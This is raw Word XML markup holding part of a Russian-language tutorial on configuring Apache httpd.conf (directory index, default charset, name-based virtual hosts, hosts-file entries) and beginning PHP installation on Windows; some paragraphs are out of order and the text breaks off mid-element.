    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>· Директива Options Includes разрешает выполнение директив SSI (Server Side Includes) в коде страниц web-сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>· Директива Options Indexes указывает, что нужно возвращать содержимое каталога, если отсутствует индексный файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание виртуальных хостов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AddDefaultCharset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DirectoryIndex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DirectoryIndex index.html index.phtml index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Содержит список индексных файлов, которые следует отображать при обращении к директории без указания имени файла (например, http://localhost/test/).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AddDefaultCharset windows-1251</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устанавливает кодировку по умолчанию, если кодировка не установлена в заголовке HTML-документа. Также Вам может потребоваться указывать значение кодировки KOI8-R.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На одном WEB-сервере Apache можно установить несколько WEB-сайтов. Эта функция сервера называется виртуальным хостингом. Ниже рассмотрим создание виртуальных узлов на основе имен. Виртуальные узлы обычно расположены в конце файла httpd.conf.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сначала требуется указать какой IP-адрес используется для виртуальных хостов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NameVirtualHost 127.0.0.1:80 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VirtualHost 127.0.0.1:80&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># Директивы виртуального хоста </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее нужно прописать директивы для контейнера &lt;VirtualHost&gt;, которые будут определять конфигурацию виртуального хоста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Файл httpd.conf. Контейнер &lt;VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VirtualHost 127.0.0.1:80&gt;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ServerAdmin webmaster@may_domain.ru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DocumentRoot c:/www/mysite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ServerName www.mysite.ru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ServerAlias www.site.ru www.host2.ru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ErrorLog logs/mysite-error.log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CustomLog logs/mysite-access.log common </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рассмотрим директивы виртуального узла:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>· DocumentRoot указывает каталог, где расположены файлы (странички) данного виртуального узла (WEB-сайта)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>· ServerName указывает имя виртуального узла, по которому к нему можно обратиться. В данном случае, по адресу http://www.mysite.ru/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>· ServerAlias содержит псевдонимы имен виртуального узла. В данном случае к виртуальному узлу можно также обратиться, используя имена: http://www.site.ru/ и http://www.host2.ru/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>· ErrorLog и CustomLog указывает имена логов сервера для этого виртуального хоста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контейнеры обычно располагают один за другим в конце файла httpd.conf.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NameVirtualHost 127.0.0.1:80 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VirtualHost 127.0.0.1:80&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># Директивы виртуального хоста 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/VirtualHost&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VirtualHost 127.0.0.1:80&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># Директивы виртуального хоста 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/VirtualHost&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VirtualHost 127.0.0.1:80&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># Директивы виртуального хоста 3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для применения изменений, вносимых в файл httpd.conf, Apache следует перезагрузить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для того, чтобы обращаться к виртуальным узлам по именам их следует прописать в базы данных DNS-сервера. Если Вы используете Apache для тестирования файлов на локальной машине, то имена ваших виртуальных узлов следует прописать в файле hosts. Для Windows 2000 и XP он расположен в каталоге C:WindowSystem32Driversets. Файл hosts содержит записи вида:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Файл httpd.conf. Подключение PHP как модуль Apache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Замечание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка PHP в качестве модуля</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка и настройка PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Формат записей файла hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 www.mysite.ru </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 www.site.ru </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>127.0.0.1 www.host2.ru</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для установки PHP следует создать каталог c:/php и разместить в н</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>м файлы из zip-архива дистрибутива. После этого следует переименовать конфигурационный файл php.ini-dist в php.ini и скопировать его в директорию Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее, необходимо сообщить Web-серверу о наличии установленного PHP. Установка PHP возможна двумя вариантами: как модуль Apache и как внешнее CGI-приложение. Ниже будут рассмотрены оба варианта установки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка PHP в качестве модуля немного повышает быстродействие, так как модуль PHP загружается один раз при запуске Web-сервера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
